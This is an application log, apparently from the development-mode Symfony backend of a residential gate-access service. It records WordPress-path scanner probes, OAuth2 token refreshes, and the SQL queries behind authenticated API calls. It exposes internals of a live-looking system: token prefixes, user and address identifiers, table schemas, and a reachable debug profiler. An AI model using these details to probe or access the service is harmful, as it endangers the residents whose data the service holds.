[2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //media/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //media/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp2/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp2/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //sito/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //sito/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:48:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:55:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/pages/'%20+%20path%20+%20'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/pages/'%20+%20path%20+%20'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:56:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/pages/'%20+%20thumb%20+%20'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/pages/'%20+%20thumb%20+%20'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:59:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=events","method":"GET"} []
[2025-12-16 00:59:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-16 01:00:03] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-16 01:00:04] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-16 01:00:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["2c804dceade8cb982747326a98 [...]"] []
[2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 01:00:04] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9981ff30bf4dfeecd417d0c922 [...]","3":"2025-12-16 01:30:04","4":"","5":394,"6":"[]"} []
[2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 01:00:04] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9213daee29b9093f3f0e3503a5 [...]","3":"2026-02-14 01:00:04","4":"","5":394,"6":"[]"} []
[2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 01:00:04] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"2c804dceade8cb982747326a98 [...]"] []
[2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 01:00:05] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-16 01:00:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:00:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["8521ca3b-69bb-4665-9c69-25 [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [394,1] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [394,1] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [394,270] []
[2025-12-16 01:00:05] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/0?order=desc","method":"GET"} []
[2025-12-16 01:00:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:00:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [270,1] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 01:00:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:00:07] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"1","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/1?order=desc","method":"GET"} []
[2025-12-16 01:00:07] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:07] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 01:00:07] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 01:00:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:00:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 10 [270,1] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:00:09] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a41ce4c3-29d5-4f1f-9146-ae339979667c/providers","method":"GET"} []
[2025-12-16 01:00:09] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:09] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 01:00:09] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 01:00:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
